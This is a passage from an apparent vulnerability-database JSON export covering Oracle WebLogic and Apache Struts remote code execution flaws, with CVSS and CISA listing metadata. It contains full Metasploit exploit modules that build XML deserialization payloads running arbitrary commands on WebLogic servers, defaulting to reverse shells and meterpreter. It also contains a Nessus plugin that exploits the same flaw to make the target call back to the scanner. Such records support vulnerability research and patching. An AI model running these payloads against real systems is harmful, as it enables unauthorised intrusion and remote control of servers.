'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. 
It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" 
class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => 
normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-13T16:31:03", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.\n", "cvss3": {}, "published": "2019-04-26T01:03:17", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2023-04-04T09:27:11", "id": "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' => [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2019-2725'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 
'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],\n ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']\n ],\n 'Privileged' => false,\n 'Platform' => %w[unix win solaris],\n 'Targets' => [\n [\n 'Unix',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Solaris',\n {\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => '2019-04-23',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => { 'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status('The target returned a non-vulnerable HTTP code')\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status('The target did not respond in an expected way')\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP 
code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status('Generating payload...')\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })\n when 'Unix', 'Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %(<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\")\n soap_payload << %(xmlns:wsa=\"http://www.w3.org/2005/08/addressing\")\n soap_payload << %(xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">)\n soap_payload << %(<soapenv:Header>)\n soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)\n soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)\n soap_payload << %(<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">)\n soap_payload << %(<void class=\"java.lang.ProcessBuilder\">)\n soap_payload << %(<array class=\"java.lang.String\" length=\"3\">)\n soap_payload << %(<void index=\"0\">)\n soap_payload << %(<string>#{string0_cmd}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"1\">)\n soap_payload << %(<string>#{string1_param}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"2\">)\n soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)\n # soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %(</void>)\n soap_payload << %(</array>)\n soap_payload << %(<void method=\"start\"/>)\n soap_payload << %(</void>)\n soap_payload << %(</work:WorkContext>)\n soap_payload << %(</soapenv:Header>)\n soap_payload << %(<soapenv:Body>)\n soap_payload << %(<asy:onAsyncDelivery/>)\n 
soap_payload << %(</soapenv:Body>)\n soap_payload << %(</soapenv:Envelope>)\n\n print_status('Sending payload...')\n\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => { 'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, 'No response from host')\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply, \"Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-18T14:22:37", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. 
An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "Oracle WebLogic WSAT Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. 
An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... 
although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 
and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:22", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. 
An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. 
An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-06-07T15:52:18", "description": "Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Oracle Corporation WebLogic Server 
Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-10271", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-05T15:37:18", "description": "Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": 
"2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-5638", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T15:52:18", "description": "Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server, Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-2725", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. 
